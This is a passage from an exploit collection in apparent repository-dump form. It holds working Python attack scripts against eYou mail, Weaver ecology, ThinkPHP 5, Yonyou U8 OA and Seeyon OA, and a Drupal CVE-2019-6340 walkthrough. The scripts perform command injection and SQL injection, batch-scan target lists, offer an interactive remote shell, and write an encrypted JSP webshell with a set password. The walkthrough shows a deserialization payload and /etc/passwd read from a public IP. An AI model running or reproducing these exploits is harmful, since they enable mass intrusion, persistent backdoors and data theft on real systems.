| data = "type='|whoami||'" 40 | try: 41 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 42 | response = requests.post(url=target_url, data=data, headers=headers, verify=False, timeout=10) 43 | if response.status_code == 200: 44 | dr = re.compile(r'<[^>]+>',re.S) 45 | dd = dr.sub('',response.text) 46 | dd = dd.strip('\n') 47 | print("\033[32m[+] 目标 {}存在漏洞,响应为:\n{}\033[0m".format(url,dd)) 48 | with open('success.txt', 'a', encoding='utf8') as vul: 49 | vul.write(url+'\n') 50 | else: 51 | print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(url)) 52 | except Exception as e: 53 | print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(url)) 54 | 55 | # 对单个url进行验证 56 | def scan1(url): 57 | exp1(str(url)) 58 | 59 | 60 | # 批量漏洞验证 61 | def scan2(file): 62 | with open(file, "r", encoding='utf8') as scan_url: 63 | for url in scan_url: 64 | if url[:4] != "http": 65 | url = "http://" + url 66 | url = url.strip('\n') 67 | try: 68 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 69 | req = requests.get(url=url, verify=False, timeout=10) 70 | if req.status_code == 200: 71 | print("\033[32m[+] 正在请求{}".format(url)) 72 | exp1(url) 73 | except: 74 | pass 75 | try: 76 | url = url.replace("http","https") 77 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 78 | req = requests.get(url=url, verify=False, timeout=10) 79 | if req.status_code == 200: 80 | print("\033[32m[+] 正在请求{}".format(url)) 81 | exp1(url) 82 | except: 83 | pass 84 | # 命令执行 85 | def command(url, cmd): 86 | target_url = url + "/webadm/?q=moni_detail.do&action=gragh" 87 | headers = { 88 | "User-Agent": get_ua(), 89 | "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8", 90 | "Accept-Encoding": "gzip, deflate", 91 | "Accept-Language": "zh-CN,zh;q=0.9", 92 | } 93 | data = "type='|"+cmd+"||'" 94 | try: 95 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 96 | response = requests.post(url=target_url, data=data, headers=headers, verify=False, timeout=10) 97 | if response.status_code == 200: 98 | dr = re.compile(r'<[^>]+>',re.S) 99 | dd = dr.sub('',response.text) 100 | dd = dd.strip('\n') 101 | print("\033[32m[+] 目标 {}存在漏洞,响应为:\n{}\033[0m".format(url,dd)) 102 | else: 103 | print("\033[31m[x]目标 {}不存在漏洞 \033[0m".format(url)) 104 | except Exception as e: 105 | print("\033[31m[x]目标 {} 请求失败 \033[0m".format(url)) 106 | 107 | 108 | @click.command() 109 | @click.option("-u", "--url", help='Target URL,对单一目标检测; Example:python3 EYouMailRCE.py -u https://ip:port') 110 | @click.option("-f", "--file", help="Target File,对批量目标检测; Example:python3 EYouMailRCE.py -f ip.txt") 111 | @click.option("-c", "--cmd", help="Target command,命令执行; Example: python3 EYouMailRCE.py -cmd id") 112 | def main(url,file,cmd): 113 | info() 114 | if url != None and file == None and cmd ==None: 115 | scan1(url) 116 | elif url == None and file != None and cmd ==None: 117 | scan2(file) 118 | elif url != None and file == None and cmd !=None: 119 | command(url, cmd) 120 | else: 121 | print("python3 EYouMailRCE.py --help") 122 | 123 | if __name__ == '__main__': 124 | main() 125 | -------------------------------------------------------------------------------- /泛微OA/ecology_test/ecology_test.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | 6 | print ''' 7 | ------------------------------------ 8 | Ecology test script by LuckyEast >_< 9 | ------------------------------------ 10 | 11 | plz wait... 12 | ''' 13 | 14 | 15 | 16 | def sql_test(url): 17 | headers = { 18 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0', 19 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 20 | 'Accept-Language': 'zh-CN,zh;q=0.9', 21 | 'Content-Type': 'application/x-www-form-urlencoded' 22 | } 23 | vul_url = url + '/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333' 24 | poc = "formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1" 25 | 26 | try: 27 | rsp = requests.post(url=vul_url, data=poc, headers=headers, verify=False, timeout=10) 28 | num = rsp.text 29 | sta = rsp.status_code 30 | if len(num)>1000 and sta == 200: 31 | if 'HOST' in num: 32 | success_sql.write(url + '\n') 33 | except Exception: 34 | pass 35 | 36 | def rce_test(target): 37 | headers = { 38 | 'Content-Type': 'text/xml; charset=utf-8', 39 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 40 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0', 41 | 'Cache-Control': 'max-age=0', 42 | 'Content-Type': 'application/x-www-form-urlencoded', 43 | 'Upgrade-Insecure-Requests': '1', 44 | 'Content-Length': '578' 45 | } 46 | 47 | url_list = {'url_1':'/bsh.servlet.BshServlet', 'url_2':'/weaver/bsh.servlet.BshServlet', 'url_3':'/weaveroa/bsh.servlet.BshServlet', 'url_4':'/oa/bsh.servlet.BshServlet'} 48 | 49 | payload = {'poc_1':'bsh.script=exec("whoami");&bsh.servlet.output=raw', 'poc_2':'bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.output=raw', 'poc_3':r'bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\"command\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami'} 50 | 51 | for url in url_list: 52 | test_url = target + url_list[url] 53 | result = 0 54 | for i in payload: 55 | try: 56 | rsp = requests.post(url=test_url, data=payload[i], headers=headers, verify=False, timeout=5) 57 | sta = rsp.status_code 58 | num = rsp.text 59 | if sta == 200 and len(num) < 50: 60 | result = 1 61 | except Exception: 62 | pass 63 | if result == 1: 64 | success_rce.write(target + '\n') 65 | 66 | if __name__ == "__main__": 67 | success_sql = open("sql.txt",'a') 68 | success_rce = open("rce.txt", 'a') 69 | iplist = open (sys.argv[1], "r") 70 | for line in iplist: 71 | url = line.strip() 72 | sql_test(url) 73 | rce_test(url) 74 | success_sql.close() 75 | success_rce.close() 76 | print 'success!!!' 77 | -------------------------------------------------------------------------------- /thinkphp5/thinkphp5.0.x_RCE/tp5-rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import optparse 4 | import threading 5 | import os 6 | import queue 7 | import datetime 8 | from requests.packages import urllib3 9 | 10 | headers={ 11 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0' 12 | } 13 | 14 | session=requests.session() 15 | 16 | lock=threading.Lock() 17 | 18 | q1=queue.Queue() 19 | 20 | command1='' 21 | 22 | threadlist=[] 23 | 24 | poclist=[ 25 | '/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1', 26 | '/index.php/?s=captcha' 27 | ] 28 | 29 | explist=[ 30 | '/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=', 31 | '/index.php/?s=captcha' 32 | ] 33 | 34 | pocdatalist=[ 35 | { 36 | '_method':'__construct', 37 | 'method':'get', 38 | 'filter':'call_user_func', 39 | 'get[]':'phpinfo' 40 | }, 41 | {'_method':'__construct', 42 | 'method':'get', 43 | 'filter':'call_user_func', 44 | 'server[REQUEST_METHOD]':'phpinfo' 45 | } 46 | ] 47 | 48 | 49 | def tp5_rce_check(url): 50 | succ=0 51 | result='' 52 | for poc in poclist: 53 | index=poclist.index(poc) 54 | tgurl=url+poc 55 | try: 56 | if index==0: 57 | r=session.get(tgurl,headers=headers,verify=False) 58 | result+=r.text 59 | else: 60 | for pocdata in pocdatalist: 61 | r=session.post(tgurl,headers=headers,data=pocdata,verify=False) 62 | result+=r.text 63 | if 'PHP Version' in result: 64 | succ+=1 65 | global pocindex 66 | pocindex=index 67 | break 68 | 69 | except: 70 | print('[!] Destination address cannot be connected') 71 | return False 72 | if succ==1: 73 | print('[+] Remote code execution vulnerability exists at the target address') 74 | return True 75 | else: 76 | print('[-] There is no remote code execution vulnerability in the target address') 77 | return False 78 | 79 | 80 | def tp5_rce_shell(url): 81 | 82 | while True: 83 | command=input("shell$") 84 | 85 | if command != "exit": 86 | 87 | if pocindex==0: 88 | shell=url+explist[0]+str(command) 89 | r=session.get(shell,headers=headers,verify=False) 90 | else: 91 | expdata={ 92 | '_method':'__construct', 93 | 'method':'get', 94 | 'filter':'system', 95 | 'get[]':command 96 | } 97 | tgurl=url+explist[pocindex] 98 | print(expdata) 99 | r=session.post(tgurl,headers=headers,data=expdata,verify=False) 100 | print(r.text) 101 | else: 102 | break 103 | 104 | def tp5_rce_file(file,threads=5): 105 | current_time=datetime.datetime.now().strftime('%Y%m%d%H%M%S') 106 | os.makedirs('./result/'+str(current_time)) 107 | file_succ=open('result/'+str(current_time)+'/'+'success.txt','w') 108 | urlfile=open(file) 109 | 110 | for url in urlfile: 111 | furl=url.strip() 112 | q1.put(furl) 113 | 114 | for thread in range(threads): 115 | t=threading.Thread(target=tp5_rce_batch,args=(file_succ,)) 116 | t.start() 117 | threadlist.append(t) 118 | 119 | for t in threadlist: 120 | t.join() 121 | 122 | print('*****Finished!*****') 123 | print('Results were saved in result/'+str(current_time)+'/') 124 | file_succ.close() 125 | urlfile.close() 126 | 127 | def tp5_rce_batch(file): 128 | urllib3.disable_warnings() 129 | 130 | while q1.empty()!=True: 131 | tgUrl=q1.get() 132 | result='' 133 | succ=0 134 | for poc in poclist: 135 | url=tgUrl+poc 136 | try: 137 | if poclist.index(poc)==0: 138 | r=session.get(url,headers=headers,verify=False) 139 | result+=r.text 140 | else: 141 | for pocdata in pocdatalist: 142 | r=session.post(url,headers=headers,data=pocdata,verify=False) 143 | result+=r.text 144 | if 'PHP Version' in result: 145 | succ+=1 146 | break 147 | except: 148 | continue 149 | 150 | if succ==1: 151 | print('{:<50}SUCCESS!'.format(tgUrl)) 152 | lock.acquire() 153 | file.write(tgUrl+'\n') 154 | lock.release() 155 | break 156 | else: 157 | print('{:<50}FIAL!'.format(tgUrl)) 158 | 159 | 160 | 161 | 162 | if __name__=='__main__': 163 | 164 | print(''' 165 | **************************************************** 166 | * thinkphp5 rce * 167 | * Coded by Longtao * 168 | **************************************************** 169 | ''') 170 | 171 | parser=optparse.OptionParser('python %prog ' +'-h (manual)',version='%prog v1.0') 172 | 173 | parser.add_option('-u', dest='tgUrl', type='string', help='single url') 174 | 175 | parser.add_option('-r', dest='tgUrlFile', type ='string', help='urls filepath[exploit default]') 176 | 177 | parser.add_option('-t', dest='threads', type='int', default=5, help='the number of threads') 178 | 179 | parser.add_option('--shell', dest='shell',action='store_true', help='cmd shell mode') 180 | 181 | (options,args)=parser.parse_args() 182 | 183 | tgUrl=options.tgUrl 184 | 185 | tgUrlFile=options.tgUrlFile 186 | 187 | threads=options.threads 188 | 189 | shell=options.shell 190 | 191 | if tgUrl: 192 | tp5_rce_check(tgUrl) 193 | if shell: 194 | tp5_rce_shell(tgUrl) 195 | 196 | elif tgUrlFile: 197 | tp5_rce_file(tgUrlFile,threads) 198 | 199 | else: 200 | print('[-] Error! example:tp5-rce.py -u http://xxx.com') 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | -------------------------------------------------------------------------------- /Drupal/CVE-2019-6340/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2019-6340 Drupal8's REST RCE, SA-CORE-2019-003 2 | 3 | ### 0x01 docker search CVE-2019-6340 4 | ``` 5 | NAME DESCRIPTION STARS OFFICIAL AUTOMATED 6 | knqyf263/cve-2019-6340 Environment for CVE-2019-6340 (Drupal) 0 7 | cved/cve-2019-6340 cve-2019-6340 0 8 | ``` 9 | ### 0x02 docker pull knqyf263/cve-2019-6340 10 | 11 | ``` 12 | Using default tag: latest 13 | latest: Pulling from knqyf263/cve-2019-6340 14 | 6ae821421a7d: Pull complete 15 | 08f3d19635b0: Pull complete 16 | dc8a54b8000b: Pull complete 17 | b2c1d103db99: Pull complete 18 | edfa752aa38a: Pull complete 19 | 583d37cbf2f0: Pull complete 20 | c7846a240c1d: Pull complete 21 | d8f9f0fd02fe: Pull complete 22 | 01d43e56770d: Pull complete 23 | dbe439e2caf9: Pull complete 24 | 3de30e1f5211: Pull complete 25 | 209dd35ef060: Pull complete 26 | 3d97847926b1: Pull complete 27 | d0da67360f39: Pull complete 28 | 30efc6ba9a1f: Pull complete 29 | a7bf83e4c4c3: Pull complete 30 | f4e7678b40a5: Pull complete 31 | 9c786cb4409c: Pull complete 32 | e2a8985b3b6b: Pull complete 33 | e6b727cd2f54: Pull complete 34 | afc99ae05ad1: Pull complete 35 | 5db8cf1431d4: Pull complete 36 | 7b90e0b5c074: Pull complete 37 | 6f123bc91ad7: Pull complete 38 | 00456a0879a4: Pull complete 39 | 5ee332aeb757: Pull complete 40 | 5a6951f3933f: Pull complete 41 | 6733bf98ddeb: Pull complete 42 | Digest: sha256:af74572eca0aa665507cb1dd536deb18ec1c17ac3ca5757b9cdf8f7adb174876 43 | Status: Downloaded newer image for knqyf263/cve-2019-6340:latest 44 | ``` 45 | ### 0x03 docker run -d -p80:80 --name jas502n knqyf263/cve-2019-6340 46 | 47 | `1ed1e2278904d06f5b8c5d5fda677b393e16414bbf0bd93f5d8f359d76360e49`</br> 48 | ![](./Drupal8.jpg) 49 | 50 | ### 0x04 python CVE-2019-6340.py url cmd 51 | `s:2:\"id\";` 52 | ![](./CVE-2019-6340.jpg) 53 | 54 | ``` 55 | python CVE-2019-6340.py http://47.75.157.227 "id" 56 | 57 | Description: Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340 58 | 59 | Example: python CVE-2019-6340.py url cmd 60 | 61 | >>>Vuln Url=http://47.75.157.227/node/ 62 | 63 | >>>>Exit CVE-2019-6340 RCE Vuln! 64 | 65 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 66 | 67 | ``` 68 | 69 | ``` 70 | python CVE-2019-6340.py http://47.75.157.227 "cat /etc/passwd" 71 | 72 | Description: Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340 73 | 74 | Example: python CVE-2019-6340.py url cmd 75 | 76 | >>>Vuln Url=http://47.75.157.227/node/ 77 | 78 | >>>>Exit CVE-2019-6340 RCE Vuln! 79 | 80 | root:x:0:0:root:/root:/bin/bash 81 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 82 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 83 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 84 | sync:x:4:65534:sync:/bin:/bin/sync 85 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 86 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 87 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 88 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 89 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 90 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 91 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 92 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 93 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 94 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 95 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 96 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 97 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 98 | _apt:x:100:65534::/nonexistent:/bin/false 99 | 100 | ``` 101 | 102 | ##### burpsuite request 103 | ![](./CVE-2019-6340-burp.jpg) 104 | ``` 105 | POST /node/?_format=hal_json HTTP/1.1 106 | Host: 47.75.157.227 107 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 108 | Connection: keep-alive 109 | Content-Type: application/hal+json 110 | Accept: */* 111 | Cache-Control: no-cache 112 | Content-Length: 626 113 | 114 | { 115 | "link": [ 116 | { 117 | "value": "link", 118 | "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" 119 | } 120 | ], 121 | "_links": { 122 | "type": { 123 | "href": "http://localhost/rest/type/shortcut/default" 124 | } 125 | } 126 | } 127 | 128 | ``` 129 | ##### burpsuite response 130 | ``` 131 | HTTP/1.1 403 Forbidden 132 | Date: Mon, 27 May 2019 19:12:21 GMT 133 | Server: Apache/2.4.25 (Debian) 134 | X-Powered-By: PHP/7.2.15 135 | Cache-Control: must-revalidate, no-cache, private 136 | X-UA-Compatible: IE=edge 137 | Content-language: en 138 | X-Content-Type-Options: nosniff 139 | X-Frame-Options: SAMEORIGIN 140 | Expires: Sun, 19 Nov 1978 05:00:00 GMT 141 | Vary: 142 | X-Generator: Drupal 8 (https://www.drupal.org) 143 | Keep-Alive: timeout=5, max=100 144 | Connection: Keep-Alive 145 | Content-Type: application/hal+json 146 | Content-Length: 239 147 | 148 | {"message":"The shortcut set must be the currently displayed set for the user and the user must have \u0027access shortcuts\u0027 AND \u0027customize shortcut links\u0027 permissions."}uid=33(www-data) gid=33(www-data) groups=33(www-data) 149 | ``` 150 | ### 0x05 参考链接 151 | `https://github.com/knqyf263/CVE-2019-6340` </br> 152 | `https://www.ambionics.io/blog/drupal8-rce` </br> 153 | `https://gist.githubusercontent.com/theMiddleBlue/22c6908d955519bd23b3d0b349badcc5/raw/af5746d4755c9e4cca6d8ef15334f81027c524df/drupal8rce.json`</br> 154 | `https://www.drupal.org/sa-core-2019-003` 155 | -------------------------------------------------------------------------------- /用友OA/用友U8_OA_SQL注入/getshell_poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | import base64 6 | import time 7 | import json 8 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 9 | 10 | def title(): 11 | print('+----------------------------------------------------') 12 | print('+ \033[34mVersion: 用友 U8 OA test.jsp SQL注入漏洞 \033[0m') 13 | print('+ \033[36m使用格式: python3 getshell_poc.py \033[0m') 14 | print('+ \033[36m文件名: url.txt \033[0m') 15 | print('+----------------------------------------------------') 16 | 17 | #随机ua 18 | def get_ua(): 19 | first_num = random.randint(55, 62) 20 | third_num = random.randint(0, 3200) 21 | fourth_num = random.randint(0, 140) 22 | os_type = [ 23 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 24 | '(Macintosh; Intel Mac OS X 10_12_6)' 25 | ] 26 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 27 | 28 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 29 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 30 | ) 31 | return ua 32 | 33 | 34 | def POC_1(url): 35 | vuln_url = url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)" 36 | try: 37 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 38 | response = requests.get(url=vuln_url, verify=False, timeout=15) 39 | if '序号' in response.text and "@@basedir" in response.text and response.status_code == 200: 40 | OA_dir = re.findall(r'>(.*)\\mysql\\', response.text)[0] 41 | OA_dir = OA_dir.replace("\\","/") 42 | print("\033[32m[+]目标 {} 存在SQL注入漏洞".format(url)) 43 | webshell_name = "update_{}.jsp".format(random.randint(1,5)) 44 | OA_dir = OA_dir + "/tomcat/webapps/yyoa/{}".format(webshell_name) 45 | POC_2(url, OA_dir, webshell_name) 46 | else: 47 | print("\033[31m[x]目标 {} 不存在SQL注入漏洞 \033[0m".format(url)) 48 | except Exception as e: 49 | print("\033[31m[x]目标 {} 请求失败 \033[0m".format(url), e) 50 | 51 | def POC_2(url, OA_dir, webshell_name): 52 | vuln_url = url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex(%273c25407061676520696d706f72743d226a6176612e7574696c2e2a2c6a617661782e63727970746f2e2a2c6a617661782e63727970746f2e737065632e2a22253e3c2521636c617373205520657874656e647320436c6173734c6f616465727b5528436c6173734c6f616465722063297b73757065722863293b7d7075626c696320436c61737320672862797465205b5d62297b72657475726e2073757065722e646566696e65436c61737328622c302c622e6c656e677468293b7d7d253e3c2569662028726571756573742e6765744d6574686f6428292e657175616c732822504f53542229297b537472696e67206b3d2235383233636433303933663136663362223b73657373696f6e2e70757456616c7565282275222c6b293b43697068657220633d4369706865722e676574496e7374616e6365282241455322293b632e696e697428322c6e6577205365637265744b657953706563286b2e676574427974657328292c224145532229293b6e6577205528746869732e676574436c61737328292e676574436c6173734c6f616465722829292e6728632e646f46696e616c286e65772073756e2e6d6973632e4241534536344465636f64657228292e6465636f646542756666657228726571756573742e67657452656164657228292e726561644c696e6528292929292e6e6577496e7374616e636528292e657175616c732870616765436f6e74657874293b7d253e%27)%20%20into%20outfile%20%27{}%27".format(OA_dir) 53 | webshell_dir = url +"/yyoa/"+ webshell_name 54 | try: 55 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 56 | response = requests.get(url=vuln_url, verify=False, timeout=5) 57 | if 'already' in response.text and response.status_code == 200: 58 | print("\033[32m[+]文件写入木马上传失败,目标已存在相同文件,请重新运行\033[0m") 59 | elif "No Data" in response.text and response.status_code == 200: 60 | print("\033[32m[+]文件写入木马上传成功,上传路径为 {}\033[0m".format(webshell_dir)) 61 | print("\033[32m[+]请使用冰蝎连接,密码为: bxmm\033[0m") 62 | with open('webshell.txt', 'a', encoding='utf8') as vul: 63 | vul.write("请使用冰蝎连接,密码为: bxmm\nwebshell 地址:\n{} \n".format(webshell_dir)) 64 | else: 65 | print("\033[31m[x] 目标 {} 木马上传失败 \033[0m".format(url)) 66 | except Exception as e: 67 | print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(url), e) 68 | 69 | def Scan(file_name): 70 | header={"User-Agent": get_ua(),} 71 | with open(file_name, "r", encoding='utf8') as scan_url: 72 | for url in scan_url: 73 | if url[:4] != "http": 74 | url = "http://" + url 75 | url = url.strip('\n') 76 | try: 77 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 78 | httpError = False 79 | try: 80 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 81 | except Exception as e: 82 | httpError = True 83 | if not httpError and req.status_code == 200: 84 | print("\033[32m[+]正在请求{}".format(url)) 85 | else: 86 | url = url.replace("http","https") 87 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 88 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 89 | if req.status_code == 200: 90 | print("\033[32m[+]正在请求{}".format(url)) 91 | else: 92 | pass 93 | except Exception as e: 94 | print("\033[31m[x] "+url+" 访问失败 \033[0m".format(e)) 95 | else: 96 | pass 97 | try: 98 | POC_1(url) 99 | 100 | except Exception as e: 101 | print("\033[31m[x] "+url+" 请求报错 \033[0m".format(e)) 102 | continue 103 | 104 | if __name__ == '__main__': 105 | title() 106 | file_name = str(input("\033[35m请输入需要检测的文件名:\033[0m")) 107 | Scan(file_name) 108 | -------------------------------------------------------------------------------- /seeyon/致远OA_Session泄露_任意文件上传漏洞/exp.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | import time 3 | import datetime 4 | import zipfile 5 | import random 6 | import string 7 | import requests 8 | import re 9 | import os 10 | 11 | requests.packages.urllib3.disable_warnings() 12 | 13 | def title(): 14 | print('+---------------------------------------------------') 15 | print('+ \033[34mVersion: 致远OA Session泄露 任意文件上传漏洞 \033[0m') 16 | print('+ \033[36m使用格式: python3 exp.py \033[0m') 17 | print('+ \033[36murl: http://xxx.xxx.xxx.xxx \033[0m') 18 | print('+---------------------------------------------------') 19 | 20 | #随机ua 21 | def get_ua(): 22 | first_num = random.randint(55, 62) 23 | third_num = random.randint(0, 3200) 24 | fourth_num = random.randint(0, 140) 25 | os_type = [ 26 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 27 | '(Macintosh; Intel Mac OS X 10_12_6)' 28 | ] 29 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 30 | 31 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 32 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 33 | ) 34 | return ua 35 | 36 | def check_file(): 37 | path = os.getcwd() 38 | file_path = os.path.join(path,"payload.zip") 39 | if os.path.exists(file_path): 40 | os.remove(file_path) 41 | 42 | 43 | def write_zipfile(fname, content): 44 | with zipfile.ZipFile( 45 | 'payload.zip', 46 | mode='a', 47 | compression=zipfile.ZIP_DEFLATED, 48 | ) as zf: 49 | zf.writestr('layout.xml', "") 50 | zf.writestr(fname, content) 51 | 52 | 53 | 54 | def rand_str(num): 55 